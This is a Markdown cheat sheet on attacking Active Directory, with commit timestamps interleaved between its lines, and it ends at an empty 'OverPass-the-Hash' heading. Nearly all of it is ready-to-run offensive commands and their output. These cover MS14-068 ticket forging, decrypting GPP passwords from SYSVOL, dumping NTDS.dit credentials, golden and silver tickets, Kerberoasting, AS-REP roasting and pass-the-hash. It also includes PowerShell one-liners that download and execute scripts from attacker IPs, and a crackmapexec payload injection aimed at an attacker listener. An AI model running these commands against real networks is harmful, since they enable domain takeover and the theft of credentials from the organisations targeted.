2018-03-12 08:17:31 +00:00
# Active Directory Attacks
2018-05-05 15:41:04 +00:00
## Summary
2018-08-12 21:30:22 +00:00
2018-05-05 15:41:04 +00:00
* [Tools ](#tools )
* [Most common paths to AD compromise ](#most-common-paths-to-ad-compromise )
* [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability) ](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability )
2018-07-08 18:03:40 +00:00
* [Open Shares ](#open-shares )
2018-05-05 15:41:04 +00:00
* [GPO - Pivoting with Local Admin & Passwords in SYSVOL ](#gpo---pivoting-with-local-admin--passwords-in-sysvol )
2018-08-12 21:30:22 +00:00
* [Dumping AD Domain Credentials ](#dumping-ad-domain-credentials-systemrootntdsntdsdit )
2018-07-08 18:03:40 +00:00
* [Password in AD User comment ](#password-in-ad-user-comment )
* [Golden Tickets ](#passtheticket-golden-tickets )
* [Silver Tickets ](#passtheticket-silver-tickets )
2018-05-05 15:41:04 +00:00
* [Kerberoast ](#kerberoast )
2019-03-24 12:16:23 +00:00
* [KRB_AS_REP roasting ](#krb_as_rep-roasting )
2018-05-05 15:41:04 +00:00
* [Pass-the-Hash ](#pass-the-hash )
* [OverPass-the-Hash (pass the key) ](#overpass-the-hash-pass-the-key )
2018-12-25 19:35:39 +00:00
* [Capturing and cracking NTLMv2 hashes ](#capturing-and-cracking-ntlmv2-hashes )
2018-12-26 00:02:17 +00:00
* [NTLMv2 hashes relaying ](#ntlmv2-hashes-relaying )
2018-05-05 15:41:04 +00:00
* [Dangerous Built-in Groups Usage ](#dangerous-built-in-groups-usage )
2018-07-15 09:06:43 +00:00
* [Trust relationship between domains ](#trust-relationship-between-domains )
2019-07-17 21:17:35 +00:00
* [Unconstrained delegation ](#unconstrained-delegation )
* [Resource-Based Constrained Delegation ](#resource-based-constrained-delegation )
2019-02-10 18:51:54 +00:00
* [PrivExchange attack ](#privexchange-attack )
2019-03-24 12:16:23 +00:00
* [Password spraying ](#password-spraying )
2019-07-25 12:08:32 +00:00
* [PXE Boot image attack ](#pxe-boot-image-attack )
2018-05-05 15:41:04 +00:00
2018-05-05 15:32:19 +00:00
## Tools
2018-08-12 21:30:22 +00:00
2018-05-16 21:33:14 +00:00
* [Impacket ](https://github.com/CoreSecurity/impacket ) or the [Windows version ](https://github.com/maaaaz/impacket-examples-windows )
2018-05-05 15:32:19 +00:00
* [Responder ](https://github.com/SpiderLabs/Responder )
* [Mimikatz ](https://github.com/gentilkiwi/mimikatz )
* [Ranger ](https://github.com/funkandwagnalls/ranger )
* [BloodHound ](https://github.com/BloodHoundAD/BloodHound )
2018-08-12 21:30:22 +00:00
```powershell
apt install bloodhound #kali
neo4j console
Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j
./bloodhound
SharpHound.exe (from resources/Ingestor)
2019-01-07 17:15:45 +00:00
SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100
2018-08-12 21:30:22 +00:00
or
Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
2019-03-24 15:26:00 +00:00
or
bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all
2018-08-12 21:30:22 +00:00
```
2018-05-05 15:32:19 +00:00
* [AdExplorer ](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer )
* [CrackMapExec ](https://github.com/byt3bl33d3r/CrackMapExec )
2018-08-12 21:30:22 +00:00
```bash
git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
crackmapexec smb -L
crackmapexec smb -M name_module -o VAR=DATA
2019-05-25 16:19:08 +00:00
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --local-auth
2018-08-12 21:30:22 +00:00
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares
2019-08-15 16:21:06 +00:00
crackmapexec 192.168.1.100 -u Jaddmon -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher
2018-08-12 21:30:22 +00:00
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami'
2018-12-14 23:51:33 +00:00
crackmapexec mimikatz --server http --server-port 80
2018-08-12 21:30:22 +00:00
```
2019-04-21 12:08:18 +00:00
* [Mitm6 ](https://github.com/fox-it/mitm6.git )
```bash
git clone https://github.com/fox-it/mitm6.git & & cd mitm6
pip install .
mitm6 -d lab.local
ntlmrelayx.py -wh 192.168.218.129 -t smb://192.168.218.128/ -i
# -wh: Server hosting WPAD file (Attacker’ s IP)
# -t: Target (You cannot relay credentials to the same device that you’ re spoofing)
# -i: open an interactive shell
```
2018-05-05 15:32:19 +00:00
* [PowerSploit ](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon )
2018-08-12 21:30:22 +00:00
```powershell
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks"
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"
```
2018-05-20 20:10:33 +00:00
* [Active Directory Assessment and Privilege Escalation Script ](https://github.com/hausec/ADAPE-Script )
2019-03-24 15:00:27 +00:00
```powershell
powershell.exe -ExecutionPolicy Bypass ./ADAPE.ps1
```
2019-02-17 19:02:16 +00:00
* [Ping Castle ](https://github.com/vletoux/pingcastle )
```powershell
pingcastle.exe --healthcheck --server < DOMAIN_CONTROLLER_IP > --user < USERNAME > --password < PASSWORD > --advanced-live --nullsession
2019-08-03 21:22:14 +00:00
pingcastle.exe --healthcheck --server domain.local
pingcastle.exe --graph --server domain.local
pingcastle.exe --scanner scanner_name --server domain.local
available scanners are:aclcheck,antivirus,corruptADDatabase,foreignusers,laps_bitlocker,localadmin,ullsession,nullsession-trust,share,smb,spooler,startup
2019-02-17 19:02:16 +00:00
```
2018-05-05 15:32:19 +00:00
2019-03-24 12:16:23 +00:00
* [Kerbrute ](https://github.com/ropnop/kerbrute )
```powershell
./kerbrute passwordspray -d < DOMAIN > < USERS.TXT > < PASSWORD >
```
2019-07-22 19:45:50 +00:00
* [Rubeus ](https://github.com/GhostPack/Rubeus )
```powershell
Rubeus.exe asktgt /user:USER < /password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ptt] [/luid]
Rubeus.exe dump [/service:SERVICE] [/luid:LOGINID]
Rubeus.exe klist [/luid:LOGINID]
Rubeus.exe kerberoast [/spn:"blah/blah"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."]
```
2018-03-12 08:17:31 +00:00
## Most common paths to AD compromise
2018-05-05 15:32:19 +00:00
### MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)
2018-08-12 21:30:22 +00:00
2019-06-29 15:55:13 +00:00
This exploit require to know the user SID, you can use `rpcclient` to remotely get it or `wmi` if you have an access on the machine.
```powershell
# remote
rpcclient $> lookupnames john.smith
john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1)
# loc
wmic useraccount get name,sid
Administrator S-1-5-21-3415849876-833628785-5197346142-500
Guest S-1-5-21-3415849876-833628785-5197346142-501
Administrator S-1-5-21-297520375-2634728305-5197346142-500
Guest S-1-5-21-297520375-2634728305-5197346142-501
krbtgt S-1-5-21-297520375-2634728305-5197346142-502
lambda S-1-5-21-297520375-2634728305-5197346142-1110
```
2018-05-05 15:32:19 +00:00
```bash
Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
2019-06-29 15:55:13 +00:00
```
Generate a ticket with `metasploit` or `pykek`
```powershell
2018-05-05 15:32:19 +00:00
Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
2019-06-29 15:55:13 +00:00
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN LABDOMAIN.LOCAL yes The Domain (upper case) Ex: DEMO.LOCAL
PASSWORD P@ssw0rd yes The Domain User password
RHOSTS 10.10.10.10 yes The target address range or CIDR identifier
RPORT 88 yes The target port
Timeout 10 yes The TCP timeout to establish connection and read data
USER lambda yes The Domain User
USER_SID S-1-5-21-297520375-2634728305-5197346142-1106 yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
```
2018-05-05 15:32:19 +00:00
2019-06-29 15:55:13 +00:00
```powershell
# https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek
git clone https://github.com/SecWiki/windows-kernel-exploits
2018-05-05 15:32:19 +00:00
python ./ms14-068.py -u < userName > @< domainName > -s < userSid > -d < domainControlerAddr > -p < clearPassword >
python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org
2019-06-29 15:55:13 +00:00
python ./ms14-068.py -u john.smith@pwn3d.local -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d 192.168.115.10
```
Then use `mimikatz` to load the ticket.
```powershell
2018-05-05 15:32:19 +00:00
mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
```
2019-06-29 15:55:13 +00:00
:warning: If the clock is skewed use `clock-skew.nse` script from `nmap`
```powershell
2019-08-15 16:21:06 +00:00
Linux> $ nmap -sV -sC 10.10.10.10
2019-06-29 15:55:13 +00:00
clock-skew: mean: -1998d09h03m04s, deviation: 4h00m00s, median: -1998d11h03m05s
2019-08-15 16:21:06 +00:00
Linux> sudo date -s "14 APR 2015 18:25:16"
Windows> net time /domain /set
2019-06-29 15:55:13 +00:00
```
2018-12-25 19:35:39 +00:00
### Open Shares
2018-08-12 21:30:22 +00:00
2018-12-25 18:38:37 +00:00
```powershell
2019-06-29 15:55:13 +00:00
smbmap -H 10.10.10.10 # null session
smbmap -H 10.10.10.10 -R # recursive listing
smbmap -H 10.10.10.10 -u invaliduser # guest smb session
smbmap -H 10.10.10.10 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18
2018-12-25 18:38:37 +00:00
```
or
2018-07-08 18:03:40 +00:00
```powershell
pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share
2019-06-16 21:45:52 +00:00
pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/C$
2018-12-24 14:02:50 +00:00
ls # list files
cd # move inside a folder
2018-07-08 18:03:40 +00:00
get # download files
put # replace a file
```
2018-12-14 23:51:33 +00:00
or
```powershell
smbclient -I 10.10.10.100 -L ACTIVE -N -U ""
2018-12-24 14:02:50 +00:00
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
use Sharename # select a Sharename
cd Folder # move inside a folder
ls # list files
2018-12-14 23:51:33 +00:00
```
2019-05-12 20:23:55 +00:00
Download a folder recursively
```powershell
smbclient //10.0.0.1/Share
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> lcd '/path/to/go/'
smb: \> mget *
```
2018-07-08 18:03:40 +00:00
Mount a share
2018-08-12 21:30:22 +00:00
2018-07-08 18:03:40 +00:00
```powershell
smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
2019-08-15 16:21:06 +00:00
sudo mount -t cifs -o username=< user > ,password=< pass > //< IP > /Users folder
2018-07-08 18:03:40 +00:00
```
2018-05-05 15:32:19 +00:00
### GPO - Pivoting with Local Admin & Passwords in SYSVOL
2018-08-12 21:30:22 +00:00
:triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local
2018-05-05 15:32:19 +00:00
2019-02-07 22:33:47 +00:00
Find password in SYSVOL (MS14-025)
2018-08-12 21:30:22 +00:00
2018-05-05 15:32:19 +00:00
```powershell
findstr /S /I cpassword \\< FQDN > \sysvol\<FQDN>\policies\*.xml
```
2019-02-07 22:33:47 +00:00
Decrypt a Group Policy Password found in SYSVOL (by [0x00C651E0 ](https://twitter.com/0x00C651E0/status/956362334682849280 )), using the 32-byte AES key provided by Microsoft in the [MSDN - 2.2.1.1.4 Password Encryption ](https://msdn.microsoft.com/en-us/library/cc422924.aspx )
2018-08-12 21:30:22 +00:00
2018-05-27 20:27:31 +00:00
```bash
echo 'password_in_base64' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
2018-12-24 14:02:50 +00:00
e.g:
echo '5OPdEKwZSf7dYAvLOe6RzRDtcvT/wCP8g5RqmAgjSso=' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
echo 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
2018-05-27 20:27:31 +00:00
```
2018-05-05 15:32:19 +00:00
Metasploit modules to enumerate shares and credentials
2018-08-12 21:30:22 +00:00
2018-05-05 15:32:19 +00:00
```c
scanner/smb/smb_enumshares
2018-10-04 15:35:57 +00:00
post/windows/gather/enum_shares
post/windows/gather/credentials/gpp
2018-05-05 15:32:19 +00:00
```
2018-07-15 09:06:43 +00:00
Crackmapexec modules
2018-08-12 21:30:22 +00:00
2018-07-15 09:06:43 +00:00
```powershell
cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_autologin
cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_password
```
2018-08-12 21:30:22 +00:00
List all GPO for a domain
2018-05-05 15:32:19 +00:00
```powershell
Get-GPO -domaine DOMAIN.COM -all
Get-GPOReport -all -reporttype xml --all
Powersploit:
Get-NetGPO
Get-NetGPOGroup
```
### Dumping AD Domain Credentials (%SystemRoot%\NTDS\Ntds.dit)
2018-08-12 21:30:22 +00:00
#### Using ndtsutil
2018-05-20 20:10:33 +00:00
```powershell
2018-05-05 15:32:19 +00:00
C:\>ntdsutil
ntdsutil: activate instance ntds
ntdsutil: ifm
ifm: create full c:\pentest
ifm: quit
ntdsutil: quit
2018-05-20 20:10:33 +00:00
```
2018-05-05 15:32:19 +00:00
2019-01-28 19:27:45 +00:00
or
```powershell
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
```
2018-08-12 21:30:22 +00:00
#### Using Vshadow
2018-05-20 20:10:33 +00:00
```powershell
2018-05-05 15:32:19 +00:00
vssadmin create shadow /for=C :
Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit
```
2018-05-20 20:10:33 +00:00
2018-07-08 18:03:40 +00:00
You can also use the Nishang script, available at : [https://github.com/samratashok/nishang ](https://github.com/samratashok/nishang )
2018-08-12 21:30:22 +00:00
2018-07-08 18:03:40 +00:00
```powershell
Import-Module .\Copy-VSS.ps1
Copy-VSS
Copy-VSS -DestinationDir C:\ShadowCopy\
```
2018-08-12 21:30:22 +00:00
#### Using vssadmin
2018-07-08 18:03:40 +00:00
```powershell
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy
```
2018-08-12 21:30:22 +00:00
#### Using DiskShadow (a Windows signed binary)
2018-07-08 18:03:40 +00:00
2018-05-20 20:10:33 +00:00
```powershell
diskshadow.txt contains :
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
delete shadows volume %someAlias%
reset
then:
2018-07-08 18:03:40 +00:00
NOTE - must be executed from C:\Windows\System32
2018-05-20 20:10:33 +00:00
diskshadow.exe /s c:\diskshadow.txt
dir c:\exfil
reg.exe save hklm\system c:\exfil\system.bak
```
2018-08-12 21:30:22 +00:00
#### Extract hashes from ntds.dit
2018-05-05 15:32:19 +00:00
then you need to use secretsdump to extract the hashes
2018-08-12 21:30:22 +00:00
```java
2018-07-08 18:03:40 +00:00
secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit LOCAL
2018-05-05 15:32:19 +00:00
```
2018-08-12 21:30:22 +00:00
2018-07-07 10:04:55 +00:00
secretsdump also works remotely
2018-08-12 21:30:22 +00:00
```java
2018-07-08 18:03:40 +00:00
./secretsdump.py -dc-ip IP AD\administrator@domain -use-vss
./secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10 .0.0.1
2018-07-07 10:04:55 +00:00
```
2018-05-05 15:32:19 +00:00
2018-08-12 21:30:22 +00:00
#### Alternatives - modules
2018-05-05 15:32:19 +00:00
2018-05-20 20:10:33 +00:00
Metasploit modules
2018-08-12 21:30:22 +00:00
2018-05-05 15:32:19 +00:00
```c
windows/gather/credentials/domain_hashdump
```
PowerSploit module
2018-08-12 21:30:22 +00:00
```powershell
2018-05-05 15:32:19 +00:00
Invoke-NinjaCopy --path c:\windows\NTDS\ntds.dit --verbose --localdestination c:\ntds.dit
```
2018-07-07 10:04:55 +00:00
CrackMapExec module
2018-08-12 21:30:22 +00:00
```powershell
2018-07-07 10:04:55 +00:00
cme smb 10.10.0.202 -u username -p password --ntds vss
2019-08-18 10:08:51 +00:00
cme smb 10.10.0.202 -u username -p password --ntds drsuapi #default
2018-07-07 10:04:55 +00:00
```
2018-07-08 18:03:40 +00:00
### Password in AD User comment
2018-08-12 21:30:22 +00:00
2018-05-27 20:27:31 +00:00
```powershell
enum4linux | grep -i desc
There are 3-4 fields that seem to be common in most AD schemas:
UserPassword, UnixUserPassword, unicodePwd and msSFU30Password.
2019-05-12 19:34:09 +00:00
Get-WmiObject -Class Win32_UserAccount -Filter "Domain='COMPANYDOMAIN' AND Disabled='False'" | Select Name, Domain, Status, LocalAccount, AccountType, Lockout, PasswordRequired,PasswordChangeable, Description, SID
2018-05-27 20:27:31 +00:00
```
2019-06-23 22:21:39 +00:00
or dump the Active Directory and `grep` the content.
```powershell
ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP/
```
2018-05-20 20:10:33 +00:00
2018-07-08 18:03:40 +00:00
### PassTheTicket Golden Tickets
2018-08-12 21:30:22 +00:00
Forging a TGT require the krbtgt key
2018-05-08 20:11:36 +00:00
2018-05-05 15:32:19 +00:00
Mimikatz version
2018-08-12 21:30:22 +00:00
2018-05-05 15:32:19 +00:00
```powershell
Get info - Mimikatz
lsadump::dcsync /user:krbtgt
lsadump::lsa /inject /name:krbtgt
Forge a Golden ticket - Mimikatz
2018-07-15 09:06:43 +00:00
kerberos::purge
2018-05-05 15:32:19 +00:00
kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt
kerberos::tgt
```
Meterpreter version
2018-08-12 21:30:22 +00:00
```powershell
2018-05-05 15:32:19 +00:00
Get info - Meterpreter(kiwi)
dcsync_ntlm krbtgt
dcsync krbtgt
Forge a Golden ticket - Meterpreter
load kiwi
golden_ticket_create -d < domainname > -k < nthashof krbtgt > -s < SID without le RID > -u < user_for_the_ticket > -t < location_to_store_tck >
golden_ticket_create -d pentestlab.local -u pentestlabuser -s S-1-5-21-3737340914-2019594255-2413685307 -k d125e4f69c851529045ec95ca80fa37e -t /root/Downloads/pentestlabuser.tck
kerberos_ticket_purge
kerberos_ticket_use /root/Downloads/pentestlabuser.tck
kerberos_ticket_list
```
2018-07-08 18:03:40 +00:00
Using a ticket on Linux
2018-08-12 21:30:22 +00:00
2018-07-08 18:03:40 +00:00
```powershell
Convert the ticket kirbi to ccache with kekeo
misc::convert ccache ticket.kirbi
2018-05-08 20:11:36 +00:00
2018-07-08 18:03:40 +00:00
Alternatively you can use ticketer from Impacket
./ticketer.py -nthash a577fcf16cfef780a2ceb343ec39a0d9 -domain-sid S-1-5-21-2972629792-1506071460-1188933728 -domain amity.local mbrody-da
2018-07-15 09:06:43 +00:00
ticketer.py -nthash HASHKRBTGT -domain-sid SID_DOMAIN_A -domain DEV Administrator -extra-sid SID_DOMAIN_B_ENTERPRISE_519
./ticketer.py -nthash e65b41757ea496c2c60e82c05ba8b373 -domain-sid S-1-5-21-354401377-2576014548-1758765946 -domain DEV Administrator -extra-sid S-1-5-21-2992845451-2057077057-2526624608-519
2018-07-08 18:03:40 +00:00
export KRB5CCNAME=/home/user/ticket.ccache
cat $KRB5CCNAME
NOTE: You may need to comment the proxy_dns setting in the proxychains configuration file
2019-04-03 08:45:45 +00:00
./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100
2018-07-08 18:03:40 +00:00
```
### PassTheTicket Silver Tickets
2018-08-12 21:30:22 +00:00
2018-07-08 18:03:40 +00:00
Forging a TGS require machine accound password (key) from the KDC
2018-08-12 21:30:22 +00:00
2018-07-08 18:03:40 +00:00
```powershell
Create a ticket for the service
kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE
2019-03-15 22:27:14 +00:00
/kerberos::golden /domain:adsec.local /user:ANY /sid:S-1-5-21-1423455951-1752654185-1824483205 /rc4:ceaxxxxxxxxxxxxxxxxxxxxxxxxxxxxx /target:DESKTOP-01.adsec.local /service:cifs /ptt
2018-05-05 15:32:19 +00:00
2018-07-08 18:03:40 +00:00
Then use the same steps as a Golden ticket
misc::convert ccache ticket.kirbi
export KRB5CCNAME=/home/user/ticket.ccache
2019-04-03 08:45:45 +00:00
./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100
2018-07-08 18:03:40 +00:00
```
2018-05-05 15:32:19 +00:00
### Kerberoast
2018-08-12 21:30:22 +00:00
2018-12-25 18:38:37 +00:00
> "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names)
Any valid domain user can request a kerberos ticket for any domain service with `GetUserSPNs` . Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as.
2018-08-12 21:30:22 +00:00
```powershell
2018-12-25 18:38:37 +00:00
$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
2018-12-14 23:51:33 +00:00
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
-------------------- ------------- -------------------------------------------------------- ------------------- -------------------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40 2018-12-03 17:11:11
2018-05-08 20:11:36 +00:00
2018-12-14 23:51:33 +00:00
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$424338c0a3c3af43c360c29c154b012c$c54c7be163ae6c323ae6b5fc45a1eacee2f4903deec785cd689f4551e023775c7e7772fe85e3fb8374ca95534d72c971ba80e8b6d4ef3c3b8439dc54031540133cbcbd5f7b39d622733d198eec594c0cd181ab4696a6ad12744d1ddd2d3e2c6dd33b4daedbc9cae75e8ff2652c80421b0fa3a61ddf2cabeea462c44e0f6d9a6436717e0621bb4e0fe8bd3cf36156b4b2f7b81d651f70baf34a0b3071858b5034b895c25a0d3c67044c849d5952c381a0078a86ae562810a93d9c7bcc8311255cc9eda35a9c4d4d43ff1cc29108056285c954f3c633332ff0cb0c9c0f1896c792b247c8d25f5dd71802728fc99bb22709337b5596ab0e2045110b0b005b03351e9f71a65b48e8259f6191ce95d4e5794846c61c3abccf0f5f72a8679fb0dc0777720f5551ad99c9c9ab0955f85ee211d40b01fcaece7868960b2063923aa0f59e17b347f3308087707e95cad54b9df8179728821cf54cb204c5c2e571d9a66c8ec40b090305aa32e90a90d25ea37be6d8f8a83c683a8b69d386f9edb970596bc56fa02971f69c7e073b8de1213d9caa75ab652e5c5b99cadace9dd7d15d1d530309ea39ca1b7c6009ae3342796a6bdea084622ee95cbade437659e37363b848bad2186e3a9f7dec66e1e496db32d55eda8fb926f057996638646dcc662ed226788ddf36304dc70eaca91b26cb7180341f417fad91117ee10212c69423abd42769cbf891b51d736ffe474899eec8df64abef319d3c6dc379f2bfda33de7c3a1a50d6ece564d4559c77f560b7506fa2f1c9af7162f1247ea35706aafffde48b8cc48b1ec8e99d99ac81dc02f55f43f9726d746383cd076e7199070ff8100846ba9dc2235e92d0c7dac1f33da5fe7901e02f0566030d7c7e02535d6a300292a04e6c32d0d74d37679c2617750f5920d9c697a30c883519bc6b5a916eec354459c7f248c783bd79c436a7e8c463a8981a9e000d21c2d00c7e8468cff0ab695cb3aa4f14f149d1fafb4d656bcd1f67b747fc4c2d648466a386774853db8d50c22df57e747085142f98f5f06191c243b9dbf671da64228364f058c7e2e53a80fdde7f6dc2f25459a09fb2583757953247c222d64f49bc12d461d2e5aa572ceba2605d7eafd6031405ee422ac35cbf041b4fd28e58d871406e053d1a806de49056791646c175bf0d2aaa19f844bfc885520e19c391702be6ae61122fceac32b689764334908a4eaf7c69974a9519ebb068a15c087955fb402416bd184fd2
2018-05-05 15:32:19 +00:00
```
2019-06-16 21:45:52 +00:00
Alternatively with [Rubeus ](https://github.com/GhostPack/Rubeus )
```powershell
.\rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD
```
2018-12-25 18:38:37 +00:00
Then crack the ticket with hashcat or john
2018-12-14 23:51:33 +00:00
```powershell
hashcat -m 13100 -a 0 hash.txt crackstation.txt
./john ~/hash.txt --wordlist=rockyou.lst
```
2019-03-24 12:16:23 +00:00
### KRB_AS_REP Roasting
If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting
```powershell
C:\>git clone https://github.com/GhostPack/Rubeus#asreproast
C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user
______ _
(_____ \ | |
_____ ) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___ )
| | \ \| |_| | |_) ) ____ | |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.4
[*] Action: AS-REP roasting
[*] Target User : TestOU3user
[*] Target Domain : testlab.local
[*] SamAccountName : TestOU3user
[*] DistinguishedName : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local
[*] Using domain controller: testlab.local (192.168.52.100)
[*] Building AS-REQ (w/o preauth) for: 'testlab.local\TestOU3user'
[*] Connecting to 192.168.52.100:88
[*] Sent 169 bytes
[*] Received 1437 bytes
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
$krb5asrep$TestOU3user@testlab.local:858B6F645D9F9B57210292E5711E0...(snip)...
```
2018-08-12 21:30:22 +00:00
### Pass-the-Hash
2019-07-26 12:24:58 +00:00
The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’ t the built-in RID 500.
2018-08-12 21:30:22 +00:00
```powershell
2018-05-05 15:32:19 +00:00
use exploit/windows/smb/psexec
set RHOST 10.2.0.3
set SMBUser jarrieta
2018-05-16 21:33:14 +00:00
set SMBPass nastyCutt3r
2018-08-12 21:30:22 +00:00
# NOTE1: The password can be replaced by a hash to execute a `pass the hash` attack.
# NOTE2: Require the full NTLM hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee)
2018-05-05 15:32:19 +00:00
set PAYLOAD windows/meterpreter/bind_tcp
run
shell
2019-07-26 12:24:58 +00:00
```
2018-05-06 17:07:34 +00:00
or with crackmapexec
2019-07-26 12:24:58 +00:00
```powershell
2018-05-06 17:07:34 +00:00
cme smb 10.2.0.2 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami"
2018-05-16 21:33:14 +00:00
also works with net range : cme smb 10.2.0.2/24 ...
2019-07-26 12:24:58 +00:00
```
2018-05-06 17:07:34 +00:00
or with psexec
2019-07-26 12:24:58 +00:00
```powershell
2018-05-06 17:07:34 +00:00
proxychains python ./psexec.py jarrieta@10.2.0.2 -hashes :489a04c09a5debbc9b975356693e179d
2019-07-26 12:24:58 +00:00
```
2018-05-08 20:11:36 +00:00
or with the builtin Windows RDP and mimikatz
2019-07-26 12:24:58 +00:00
```powershell
2018-05-08 20:11:36 +00:00
sekurlsa::pth /user:< user name > /domain:< domain name > /ntlm:< the user ' s ntlm hash > /run:"mstsc.exe /restrictedadmin"
2018-05-05 15:32:19 +00:00
```
### OverPass-the-Hash (pass the key)
